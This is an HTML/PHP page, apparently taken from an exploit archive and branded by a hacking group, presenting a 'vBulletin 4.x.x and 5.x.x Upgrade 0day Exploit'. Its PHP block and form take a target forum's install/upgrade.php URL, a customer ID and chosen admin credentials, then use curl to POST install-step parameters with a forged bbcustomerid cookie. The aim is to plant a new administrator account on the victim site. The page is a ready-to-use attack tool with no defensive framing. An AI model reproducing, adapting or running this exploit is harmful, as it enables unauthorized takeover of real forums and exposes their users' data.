iq-team.org__vbulletin_x.x.x_customer_area_0day

1. <html xmlns="http://www.w3.org/1999/xhtml"><head>
2.  
3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
4.  
5. <title>vBulletin 0day</title>
6.  
7. <style type="text/css">
8.  
9. <!--
10.  
11. body {
12.  
13. background-color: #000;
14.  
15. text-align: center;
16.  
17. color: #063;
18.  
19. font-size: large;
20.  
21. }
22.  
23. .a { font-size: 24px;
24.  
25. }
26.  
27. .f { color: #060;
28.  
29. }
30.  
31. .gbf { color: #F00;
32.  
33. }
34.  
35. .dd {
36.  
37. color: #F00;
38.  
39. }
40.  
41. .w {
42.  
43. font-size: large;
44.  
45. }
46.  
47. a:link {
48.  
49. text-decoration: none;
50.  
51. }
52.  
53. a:visited {
54.  
55. text-decoration: none;
56.  
57. }
58.  
59. a:hover {
60.  
61. text-decoration: none;
62.  
63. }
64.  
65. a:active {
66.  
67. text-decoration: none;
68.  
69. }
70.  
71. -->
72.  
73. </style></head><body>
74.  
75. <p class="a">
76.  
77.  
78. <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
79.  
80. <br>Created by: 1337
81. <br>Found on: 08/22/2013
82. <br>Website: http://www.madleets.com
83. </p>
84.  
85. <br>
86. <?php
87. //extract data from the post
88. if(isset($_POST['submit'])){
89. extract($_POST);
90. //set POST variables
91. $url = $_POST['url'];
92. $fields = array(
93. 'ajax' => urlencode('1'),
94. 'version' => urlencode('install'),
95. 'checktable' => urlencode('false'),
96. 'firstrun' => urlencode('false'),
97. 'step' => urlencode('7'),
98. 'startat' => urlencode('0'),
99. 'only' => urlencode('false'),
100. 'customerid' => urlencode($_POST['customerid']),
101. 'options[skiptemplatemerge]' => urlencode('0'),
102. 'response' => urlencode('yes'),
103. 'htmlsubmit' => urlencode('1'),
104. 'htmldata[username]' => urlencode($_POST['username']),
105. 'htmldata[password]' => urlencode($_POST['password']),
106. 'htmldata[confirmpassword]' => urlencode($_POST['password']),
107. 'htmldata[email]' => urlencode($_POST['email'])
108. );
109. //url-ify the data for the POST
110. foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
111. rtrim($fields_string, '&');
112. //open connection
113. $ch = curl_init();
114. //set the url, number of POST vars, POST data
115. curl_setopt($ch,CURLOPT_URL, $url);
116. curl_setopt($ch,CURLOPT_POST, count($fields));
117. curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
118. curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
119. curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
120. //execute post
121. $result = curl_exec($ch);
122. //close connection
123. curl_close($ch);
124. exit();
125. }
126. ?>
127. <center>
128. <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
129. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
130. <span>Website:</span>
131. <input name="url" type="text" tabindex="1" size="60" />
132. <br>
133. <span>Customer ID:</span>
134. <input name="customerid" type="text" tabindex="2" size="40" />
135. <br>
136. <span>Username:</span>
137. <input name="username" type="text" tabindex="3" size="40" />
138. <br>
139. <span>Password:</span>
140. <input name="password" type="text" tabindex="4" size="40" />
141. <br>
142. <span>Email:</span>
143. <input name="email" type="text" tabindex="5" maxlength="40" />
144.  
145. <input name="submit" type="submit" value="Inject Admin">
146. </form>
147. </center>
148.  
149. <p class="a">------------------------------------------------------------------------------------------------------------------</p>
150.  
151. <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
152.  
153. <p class="a">------------------------------------------------------------------------------------------------------------------</p>
154.  
155.  
156. </div>
157.  
158. </pre>
159.  
160. <p class="a">&nbsp;</p>
161. <p align="center">
162.  
163.  
164. </body></html>